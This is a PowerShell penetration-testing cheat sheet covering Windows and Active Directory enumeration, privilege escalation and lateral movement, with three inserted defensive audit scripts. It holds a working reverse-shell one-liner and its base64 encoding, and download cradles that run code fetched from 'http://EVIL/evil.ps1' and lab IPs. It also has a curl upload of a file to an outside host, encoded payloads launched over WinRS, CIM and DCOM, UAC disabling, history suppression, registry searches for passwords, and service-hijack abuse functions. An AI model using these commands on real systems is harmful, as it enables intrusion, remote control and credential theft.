PowerShell CheatSheet

Enumeration and privilege escalation techniques for PowerShell.

PowerShell / CMD (All Commands)

Windows Workgroup (Standalone PC)

Username

whoami

Username & SID

whoami /user

Group Membership

whoami /groups

Other Users

Get-LocalUser

Other Groups

Get-LocalGroup

Get Group Membership

Get-LocalGroupMember <group_name>

Adding a User to a Group

Add-LocalGroupMember -Group "GroupName" -Member "UserName"
net localgroup administrators alex /add

Adding a Domain User to a Local Group

Add-LocalGroupMember -Group "Remote Desktop Users" -Member "CONTOSO\DomainUser"

Adding Multiple Users to a Local Group

Add-LocalGroupMember -Group "Users" -Member "User1", "User2", "CONTOSO\DomainGroup"

Changing User’s Password

net user alex P@ssword1

Obtaining Integrity Level of Current User

Import-Module NtObjectManager
Get-NtTokenIntegrityLevel

Hostname

hostname

System

systeminfo

Grabbing Security Patch Information

Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }

Listing Shares

ls \\dc01.corp.com\sysvol\corp.com
dir \\dc01.corp.com\sysvol\corp.com

Simple IP Lookup

nslookup <FQDN>

Interfaces

ipconfig /all

Routing Information

route print

Active Network Connections

netstat -ano

Test-NetConnection

Test-NetConnection -Port 443 192.168.0.1

Scripting with Test-NetConnection

foreach ($port in 1..1014) {If (($a=Test-NetConnection 192.168.50.151 -Port $port -WarningAction SilentlyContinue).tcpTestSucceeded -eq $true){ "Tcp port $port is open"}}

Scripting Port Scan with TcpClient

1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.136.151", $_)) "TCP port $_ is open"} 2>$null

Gathering Network Information from Local Store

@echo off
echo Getting network configuration from local machine:
wmic nicconfig where "IPEnabled=true" get IPAddress,DNSHostName
pause

Show Firewall Profile

Get-NetFirewallProfile

Show State (Deprecated)

netsh firewall show state

Show Configuration (Deprecated)

netsh firewall show config

Running NetSH (Port Forward)

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215

Confirm the Port Forward is Stored (Show Port Forward Table)

netsh interface portproxy show all
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.50.64   2222        10.4.50.215     22

Open Port 2222 on **MULTISERVER03 (poke a hole in the firewall)**

netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow

Delete the Firewall Rule

netsh advfirewall firewall delete rule name="port_forward_ssh_2222"

Delete the Port Forward

netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64
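An added audit example, not part of the original cheat sheet: netsh persists portproxy rules under the PortProxy registry key, so a collection script can recover the table even when netsh output is unavailable. This reads it and pairs each listener with the inbound allow firewall rules that admit traffic to its port; the listen/connect values it would find are the ones used above.

```powershell
# Added example: enumerate portproxy rules from the registry key that
# "netsh interface portproxy add" writes to, then match them with inbound
# allow rules, so a forward like 192.168.50.64:2222 -> 10.4.50.215:22 plus
# its "port_forward_ssh_2222" hole shows up even after netsh output is gone.
function Get-PersistedPortProxy {
    $base = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy'
    # The key is only created once the first rule has been added
    if (-not (Test-Path -LiteralPath $base)) { return }

    foreach ($family in 'v4tov4', 'v4tov6', 'v6tov4', 'v6tov6') {
        $key = Join-Path $base "$family\tcp"
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $item = Get-Item -LiteralPath $key
        foreach ($name in $item.GetValueNames()) {
            # Value name is "<listenaddress>/<listenport>", data is "<connectaddress>/<connectport>"
            $listen  = $name -split '/', 2
            $connect = ([string]$item.GetValue($name)) -split '/', 2
            [pscustomobject]@{
                Family         = $family
                ListenAddress  = $listen[0]
                ListenPort     = [int]$listen[1]
                ConnectAddress = $connect[0]
                ConnectPort    = [int]$connect[1]
            }
        }
    }
}

# Inbound allow rules and their local ports, enumerated once and reused.
# Port ranges ("2000-3000") and "Any" are not expanded; only exact port matches are reported.
$inbound = Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True |
    ForEach-Object {
        $ports = ($_ | Get-NetFirewallPortFilter).LocalPort
        [pscustomobject]@{ Name = $_.DisplayName; Ports = @($ports) }
    }

Get-PersistedPortProxy | ForEach-Object {
    $rule  = $_
    $holes = $inbound | Where-Object { $_.Ports -contains "$($rule.ListenPort)" } |
        Select-Object -ExpandProperty Name
    $rule | Add-Member -NotePropertyName InboundAllowRules -NotePropertyValue @($holes) -PassThru
} | Format-Table -AutoSize

# Cleanup, if a forward is not expected: the two delete commands above, or
# "netsh interface portproxy reset" to drop the whole portproxy table.
```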

Enumerating AV Software

Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntivirusProduct"
Get-Service | Where-Object { $_.DisplayName -like "*McAfee*" -or $_.DisplayName -like "*Symantec*" -or $_.DisplayName -like "*Kaspersky*" -or $_.DisplayName -like "*Bitdefender*" -or $_.DisplayName -like "*Avast*" -or $_.DisplayName -like "*Malwarebytes*" -or $_.DisplayName -like "*TotalAV*" -or $_.DisplayName -like "*Avira*" -or $_.DisplayName -like "*Trend*" -or $_.DisplayName -like "*AVG*" -or $_.DisplayName -like "*Surfshark*" -or $_.DisplayName -like "*Defender*" -or $_.DisplayName -like "*Antivirus*" -or $_.DisplayName -like "*Norton*" -or $_.DisplayName -like "*Intego*" -or $_.DisplayName -like "*Sophos*" -or $_.DisplayName -like "*ESET*" -or $_.DisplayName -like "*Webroot*" -or $_.DisplayName -like "*Aura*" -or $_.DisplayName -like "*MacKeeper*" -or $_.DisplayName -like "*F-Secure*" -or $_.DisplayName -like "*Panda*"}

Identifying MS Defender AV Status

Get-MpComputerStatus

Identifying if Defender AV is Enabled

Get-MpComputerStatus | Select-Object AntivirusEnabled

Net View Script

@echo off
echo Listing shares on local network...
net view
echo.
echo Listing shares on a specific server (e.g., \\SERVERNAME):
net view \\SERVERNAME
pause

Query Registry for 32bit Applications

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname,installlocation
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr /i "DisplayName InstallLocation"

Query Registry for 64bit Applications

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname,installlocation
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr /i "DisplayName InstallLocation"

Finding Location of Application

where <application>

Opening up Administrator Powershell Window from Command Line

start-process powershell -Verb RunAs

Running Processes

Get-Process
tasklist
wmic process list full
wmic process get name,processid,Commandline

Grabbing File Path to Binary of Specific Process

(Get-Process -Name "FireFox").Path

Filter for Specific Process

tasklist /fi "imagename eq notepad.exe"

Live Updating (refreshing list)

tasklist /v
wmic process get name,processid,workingsetsize

Getting List of All Services

Get-Service
Get-CimInstance -ClassName Win32_Service

Example of Searching for Background Services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Getting Information About a Particular Service

Get-CimInstance -ClassName win32_service | Select Name, StartMode, StartName | Where-Object {$_.Name -like 'ApacheHTTPServer'}

List Only Active Services

sc query
sc query type= service
net start

List Only Inactive Services

sc query state= inactive

Query a Specific Service

sc query <service_name>

Display Extended Information About Services

sc queryex

Display Driver Information

sc query type= driver

Query Services on Remote Server

sc \\<servername> query <servicename> <options>

Starting a Service

Start-Process -FilePath "notepad.exe"

Stopping a Service

Stop-Service "serviceName"
Stop-Process -Name "notepad" -Force
Stop-Process -Id 1234 -Force

Restarting a Service

Restart-Service <servicename> -Force

Creating a Service

sc.exe create "Scheduler" binpath= "C:\Users\oscp_\OneDrive\Desktop\scheduler.exe"

More Effective Way of Discovering Unquoted Service Paths

wmic service get name,pathname |  findstr /i /v "C:\Windows"

Gathering Permissions

icacls "C:\xampp\apache\bin\httpd.exe"
Get-Acl -Path file.txt

Disable UAC

C:\users\alex\SigmaPotato.exe "Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0"

Enumerating Safe DLL Search Mode

Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name SafeDllSearchMode

Enumerating Scheduled Tasks

Get-ScheduledTask
schtasks /query /fo LIST /v

Prints Out Just the Task Name and the Path to the Binary

Get-ScheduledTask | Select-Object TaskName, @{Name='ExecutablePath'; Expression={$_.Actions.Execute}}

Showing Information About Specific Task

Get-ScheduledTask -TaskName "MyDailyBackupTask"
schtasks /Query /TN "OneDrive Standalone Update Task-S-1-5-21-697536651-98314752-489439087-1002" /FO LIST /V

Check Powershell Command History

Get-History

Get Path to History File from PSReadline

(Get-PSReadlineOption).HistorySavePath
C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Preventing the PSReadline from Recording

Set-PSReadlineOption -HistorySaveStyle SaveNothing

Searching for `txt` or `ini` Files in Apache

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Searching for Documents and Text Files

Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

Query Registry for “password”

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Query WinLogon Registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Query SNMP Registry

reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

Query Putty Registry

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Obtain Account Policy

net accounts

Creating a Credential Object (Storing Credentials as Secure String)

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

Creating a CIM Session to Pop Calc Remotely

$options = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $options
$command = 'calc';

Invoking CIM Object

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

Normal Download Cradle

IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

Invoking Web Request

iwr -uri http://192.168.45.197/winPEASx64.exe -Outfile winPEAS.exe

Powershell 3.0+

IEX (iwr 'http://10.10.103.147:8000/powercat.ps1')

Hidden IE Com Object

$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

Msxml2.XMLHTTP COM object

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

WinHttp COM object (not proxy aware!)

$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

Using Bits Transfer - (touches disk)

Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

DNS TXT approach from PowerBreach

IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

From SubTree

<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex

Sending Data Via HTTP

chisel server --port 8080 --reverse

Sending Post Data via cURL

curl --data @/tmp/output.txt http://192.168.45.197:8080/

Accessing Web Server (Active Directory Environment)

iwr -UseDefaultCredentials http://web04

Example of Executing Remote Command

winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"

Invoking CIM Object

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$command = 'calc';
$Command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

WinRS (WinRM) with Encoded Powershell Payload (From Windows Machine)

winrs -r:files04 -u:jen -p:Nexus123!  "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

Using New-PSSession Cmdlet

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName 192.168.50.73 -Credential $credential
Enter-PSSession 1

Create DCOM Instance

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

Powershell One-Liner

$client = New-Object System.Net.Sockets.TCPClient('192.168.45.212',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Encoding Powershell One-Liner to Execute in Web Shell

pwsh
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.197",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
PS> $EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
...
powershell -ep bypass -nop -enc "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0...."

Powercat (Powershell Version of NetCat)

/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1

Pull Down File from Server

iwr -uri http://192.168.48.3/PowerUp.ps1 -Outfile PowerUp.ps1

Bypass Execution Policy

powershell -ep bypass

Run PowerUp

. .\PowerUp.ps1
Import-Module .\PowerUp.ps1

Enable All Checks

Invoke-AllChecks

Enumerate Vulnerable Service Files

Get-ModifiableServiceFile
ServiceName                     : mysql
Path                            : C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql
ModifiableFile                  : C:\xampp\mysql\bin\mysqld.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'mysql'
CanRestart                      : False

Using Abuse Function to Auto-Pwn Service File

Install-ServiceBinary -Name 'mysql'

Enumerating Unquoted Service Paths

Get-UnquotedService

Auto Abuse Function for Attacking Unquoted Path

Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"
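An added audit example, not part of the original cheat sheet or of PowerUp: it implements the check behind the wmic one-liner under "More Effective Way of Discovering Unquoted Service Paths" and behind Get-UnquotedService above, reporting only services whose unquoted path has an intermediate location the current user can actually write to. The probe writes and then deletes a zero-byte file in each candidate directory.

```powershell
# Added example: audit services whose image path is unquoted and contains spaces,
# the condition wmic/Get-UnquotedService look for. For each service it derives the
# alternative executables Windows would try (C:\Program Files\Enterprise Apps\Current.exe
# -> C:\Program.exe, C:\Program Files\Enterprise.exe) and tests whether the current
# user can create a file there. Windows-supplied services are skipped, as on the page.
function Get-UnquotedServicePathAudit {
    $systemRoot = '(?i)^' + [regex]::Escape($env:SystemRoot) + '\\'
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' } |
        ForEach-Object {
            # Executable is everything up to the first ".exe"; the rest are arguments
            $exe = ($_.PathName -split '(?i)\.exe', 2)[0] + '.exe'
            if ($exe -notmatch ' ' -or $exe -match $systemRoot) { return }

            $parts = $exe -split ' '
            $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
                ($parts[0..($i - 1)] -join ' ') + '.exe'
            }
            $writable = foreach ($c in $candidates) {
                $dir = Split-Path -Path $c -Parent
                if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
                $probe = Join-Path $dir ([guid]::NewGuid().ToString() + '.tmp')
                try {
                    [IO.File]::Create($probe).Close()
                    Remove-Item -LiteralPath $probe -Force
                    $c            # creation succeeded: this hijack location is writable
                } catch { }       # access denied: not writable by this user
            }
            [pscustomobject]@{
                Service         = $_.Name
                StartName       = $_.StartName
                StartMode       = $_.StartMode
                PathName        = $_.PathName
                WritableTargets = @($writable)
            }
        }
}

# Report only services an unprivileged user could hijack; the fix is to quote the
# path, e.g.  sc.exe config <service> binPath= "\"C:\Program Files\App\svc.exe\""
Get-UnquotedServicePathAudit | Where-Object { $_.WritableTargets.Count -gt 0 } | Format-List
```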

Active Directory Specific

Username & SID

whoami /user

Current User Principal Name

whoami /upn

Current User Fully Qualified Distinguished Name (FQDN)

whoami /fqdn

Current User Logon ID

whoami /logonid

Domain Users

net user /domain

Query Specific Domain User

net user jeff /domain

Domain Groups

net group /domain

Query Specific Domain Group

net group "Sales Department" /domain

Finding the Primary Domain Controller

$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"
$LDAP

Grabbing All Properties of Users in Domain

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }

    Write-Host "-------------------------------"
}

Grabbing the `MemberOf` Property of Each User

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop.memberof
    }

    Write-Host "-------------------------------"
}

Grabbing All Properties for a Specific User

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="name=jeff"
$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }

    Write-Host "-------------------------------"
}

Adapted Script to Accept Command Line Arguments

function LDAPSearch {
    param (
        [string]$LDAPQuery
    )

    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DistinguishedName = ([adsi]'').distinguishedName

    $DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")

    $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)

    return $DirectorySearcher.FindAll()

}
Import-Module .\function.ps1
LDAPSearch -LDAPQuery "(samAccountType=805306368)"
LDAPSearch -LDAPQuery "(objectclass=group)"
$sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Sales Department))"
$sales.properties.member
$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Domain Admin*))"
$group.properties.member

Running Loop Over Script (Above) to Grab Groups and their Members

foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) {
    $group.properties | select {$_.cn}, {$_.member}
}
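An added audit example, not part of the original cheat sheet: it reuses the DirectorySearcher pattern above to list user accounts carrying an SPN (the accounts the SPN enumeration commands on this page surface) together with password age and the userAccountControl flags that weaken them, so the owner knows which to rotate, move to a gMSA, or re-enable pre-authentication on. The 365-day threshold is an assumed default.

```powershell
# Added example: Kerberos exposure audit built on the LDAPSearch pattern above.
function Get-SpnAccountAudit {
    param ([int]$MaxPasswordAgeDays = 365)   # assumed threshold; adjust to policy

    $PDC   = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DN    = ([adsi]'').distinguishedName
    $entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DN")

    # samAccountType 805306368 = normal user accounts (computers are 805306369, so they
    # are not matched); krbtgt always carries an SPN and is excluded explicitly.
    $filter   = '(&(samAccountType=805306368)(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))'
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($entry, $filter)
    $searcher.PageSize = 500
    foreach ($attr in 'sAMAccountName','servicePrincipalName','pwdLastSet','userAccountControl','adminCount') {
        [void]$searcher.PropertiesToLoad.Add($attr)
    }

    foreach ($r in $searcher.FindAll()) {
        $p   = $r.Properties                                 # keys are lower-case
        $uac = [int](@($p['useraccountcontrol'])[0])
        # pwdLastSet is a FILETIME (100 ns ticks since 1601-01-01 UTC); 0 = must change at next logon
        $ticks  = [int64](@($p['pwdlastset'])[0])
        $pwdSet = if ($ticks -gt 0) { [datetime]::FromFileTimeUtc($ticks) } else { $null }
        $age    = if ($pwdSet) { [int]((Get-Date).ToUniversalTime() - $pwdSet).TotalDays } else { $null }

        [pscustomobject]@{
            Account          = @($p['samaccountname'])[0]
            SPNs             = @($p['serviceprincipalname'])
            PwdLastSetUtc    = $pwdSet
            PwdAgeDays       = $age
            AdminCount       = [int](@($p['admincount'])[0])     # 1 = member of a protected group
            NoPreauth        = [bool]($uac -band 0x400000)       # DONT_REQ_PREAUTH
            PasswordNeverExp = [bool]($uac -band 0x10000)        # DONT_EXPIRE_PASSWD
            Disabled         = [bool]($uac -band 0x2)            # ACCOUNTDISABLE
            StalePassword    = ($null -ne $age) -and ($age -gt $MaxPasswordAgeDays)
        }
    }
}

# Accounts to act on first: old passwords, pre-authentication disabled, or privileged.
Get-SpnAccountAudit |
    Where-Object { -not $_.Disabled -and ($_.StalePassword -or $_.NoPreauth -or $_.AdminCount -eq 1) } |
    Format-List Account, SPNs, PwdAgeDays, AdminCount, NoPreauth, PasswordNeverExp
```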

Check if SPN is Already Set On User

Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName

Force Set SPN on Account

Set-ADUser -Identity <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}

Confirm Silver Ticket is Loaded in Memory

klist

PowerView

Importing Module

Import-Module .\PowerView.ps1

Get Basic Information Regarding Domain

Get-NetDomain

List of Users in Domain

Get-NetUser

Filter Users by Name

Get-NetUser | select cn

Discover Whether Current User has Admin Privileges on Any Computers

Find-LocalAdminAccess

Finding Users that haven’t Logged in in a while

Get-NetUser | select cn,pwdlastset,lastlogon

Finding Users that are Logged in with a Session

Get-NetSession -ComputerName files04 -Verbose

Get Groups

Get-NetGroup | select cn

Enumerate Specific Group for Members

Get-NetGroup "Sales Department" | select member

Get System Information

Get-NetComputer

Filtering for OS and Hostname

Get-NetComputer | select operatingsystem,dnshostname

Filtering for Distinguished Name and Hostname

Get-NetComputer | select dnshostname,distinguishedname

Enumerate SPNs for Domain

Get-NetUser -SPN | select samaccountname,serviceprincipalname

Enumerate ACEs Applied to Current User

Get-ObjectAcl -Identity stephanie

Enumerate GenericAll rights for Specific Group

Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

Convert SID to Name

Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104

Find All Shares within a Domain

Find-DomainShare

Find Shares Only Available to Us

Find-DomainShare -CheckShareAccess